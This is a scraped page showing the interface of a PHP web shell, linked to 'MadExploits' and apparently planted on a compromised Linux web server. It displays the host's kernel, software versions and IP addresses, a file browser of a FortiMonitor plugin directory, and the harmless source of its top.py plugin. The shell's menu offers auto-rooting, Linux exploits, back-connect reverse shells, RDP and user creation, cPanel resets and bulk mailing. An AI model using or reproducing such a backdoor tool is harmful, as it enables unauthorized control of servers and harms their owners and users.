Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.142.156.58
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
lib /
fm-agent /
countermeasures /
plugins /
[ HOME SHELL ]
Name
Size
Permission
Action
CountermeasureLogHelper.py
2.29
KB
-rw-r--r--
CountermeasurePlugin.py
3.5
KB
-rw-r--r--
CountermeasureScriptHelper.py
2.28
KB
-rw-r--r--
ServiceRestartHelper.py
4.5
KB
-rw-r--r--
__init__.py
592
B
-rw-r--r--
disk_cm.py
657
B
-rw-r--r--
dmesg.py
626
B
-rw-r--r--
netstat.py
638
B
-rw-r--r--
reboot.py
844
B
-rw-r--r--
sample.py
1.88
KB
-rw-r--r--
top.py
800
B
-rw-r--r--
users_cm.py
649
B
-rw-r--r--
vmstat.py
601
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : top.py
""" FortiMonitor top Countermeasure Copyright 2023 Fortinet, Inc. All Rights Reserved. fm-ops@fortinet.com """ from CountermeasurePlugin import CountermeasurePlugin import sys class TopCountermeasure(CountermeasurePlugin): name = "top" textkey = "info.top" description = "Gather most recent top output" max_frequency = None max_runtime = None sudo_requirements = [] author = "support@panopta.com" def run(self): """ Execute the countermeasure action """ if 'freebsd' in sys.platform or "darwin" in sys.platform: return_code, output = self.execute("top -l 1") else: return_code, output = self.execute("top -b -n 1") self.save_text_output(output) self.save_return_code(return_code)
Close